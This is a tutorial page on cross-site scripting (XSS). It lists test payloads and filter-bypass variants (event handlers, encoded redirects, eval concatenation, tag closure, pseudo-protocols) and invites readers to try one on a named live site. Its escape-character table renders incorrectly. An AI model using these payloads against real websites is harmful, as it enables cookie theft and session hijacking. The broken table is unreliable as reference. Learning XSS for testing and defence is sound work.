XSS#
-
What is XSS?
Cross-Site Scripting (XSS) is abbreviated as XSS to avoid confusion with Cascading Style Sheets (CSS). Malicious attackers insert malicious HTML code into web pages, and when users browse those pages, the embedded HTML code inside the web page is executed, achieving the attacker's malicious goals. -
The harm of XSS
Stealing information from cookies through document.cookie
Using JavaScript or CSS to disrupt the normal structure and style of the page
Traffic hijacking (by accessing a segment that has window.location.href to locate another page), etc.
XSS Attack#
Reflected:
- Attackers construct a malicious link in advance to lure customers to click, such as this link: url+
?params=<script>alert("XSS attack")</script>. - Occurs in places where users interact, such as input boxes.
- Try it, URL: http://dm.unrun.top/classkey.php?page=1&classkey=
The classkey parameter accepts one parameter.
Enter <script>alert("XSS attack")</script> in the search box and submit.
The JavaScript code is executed, classkey.php does not process user input, and outputs it directly. This is an XSS reflected vulnerability, which can be used to carry out attacks, such as stealing users' cookies.
JavaScript code to get cookies: alert(document.cookie)
Then enter <script>alert(document.cookie)</script>
A pop-up box appears, stealing cookies. The website dm.unrun.top does not have cookies set, so it is empty.
This way, you can even write JavaScript code to send information to the website prepared by HK in advance.
Common test statements for XSS#
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<a href=javascript:alert(1)>
When characters are filtered#
Replace spaces with / instead of spaces
<img/src="x"/onerror=alert("xss");>
Use Chinese period instead of English comma
When entering a Chinese period, the browser will automatically convert it to an English comma
<img src="x" onerror="document.location=`http://www。baidu。com`">
Use URL encoding URL decoding encoding
<img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>
Use // instead of http://
<img src="x" onerror=document.location=`//www.baidu.com`>
Character concatenation using eval
<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">
Stack bypass#
When script is filtered
The server replaces these keywords with empty strings
str_replace("script","");
str_replace("on","");
str_replace("src","");
str_replace("data","");
str_replace("href","");
Use methods such as scr{% hint 'script' 'script is replaced with empty' %}ipt,o{% hint 'on' 'on is replaced with empty' %}n,s{% hint 'src' 'src is replaced with empty' %}rc, etc.
Tag closure bypass#
The browser looks for the closest matching tag with the previous unclosed tag. If there are two , the second one will not be parsed.
<input type="text" value='<script>alert("XSS")</script>'>
Add '> in front, which is '><script>alert("XSS")</script>
<input type="text" value=''><script>alert("XSS")</script>'>
Pseudo-protocol bypass#
When events cannot be triggered, pseudo-protocols such as javascript / data: are used, followed by the code
<object data=javascript:alert(1)>
<a href="javascript:alert(`xss`);">xss</a>
There are also these
(alert)(1); alert(1); alert`1`;
URL parsing process#
The order in which browsers decode encoding:
URL parsing->HTML parsing->CSS parsing->JS parsing
- When a browser receives an HTML document, the HTML parser will be triggered to lexically parse the HTML document. This process completes the HTML decoding and creates the DOM tree.
- Then the JavaScript parser will intervene to parse the inline script, completing the decoding of JS.
- If the browser encounters a URL context, the URL parser will intervene to complete the decoding of the URL.
The decoding order of the URL parser will vary depending on the location of the URL, which will cause parsing before or after the JavaScript parser.
XSS encoding issues#
- HTML character entities:
When rendering HTML pages, for certain special characters such as "<" or ">", if they are used directly, the browser will mistakenly interpret them as the start or end of a tag. To correctly display special characters in HTML pages, their corresponding character entities need to be used. HTML character entities start with "&" + predefined entity name, and end with a semicolon, such as the entity name for "<" is < or starting with "&" + "#" symbol and the decimal number (or hexadecimal, both can be parsed) of the character, such as the entity number for "<" is <. - JavaScript encoding: The most commonly used is the "\uXXXX" format, which is a Unicode escape sequence that represents a character. The "XXXX" represents a hexadecimal number, such as the Unicode encoding for "<" is "\u003c".
- URL encoding: % followed by the ASCII code of the character in 2-digit hexadecimal, such as the URL encoding for "/" is %2f.
Common escape characters#
HTML Online Encoding Conversion
For XSS
| Character | Escaped Character |
|---|---|
| & | & |
| < | < |
| > | > |
| " | " |
| ' | ' |
| / | / |
HackBar Tool#
HackBar Download: https://github.com/HCTYMFF/hackbar2.1.3
HackBar is a browser plugin that contains some commonly used tools, such as SQL injection, XSS, encryption, etc.
Screenshot
Location: Open the tab on the far right with F12
Convenient for URL encoding conversion
Three buttons on the right: Load URL - Split URL - Execute
For POST submissions, it is well known that GET parameters can be written in the address bar, while POST requires the use of tools.
Related Resources#
XSS (Cross-Site Scripting) Detailed Explanation - CSDN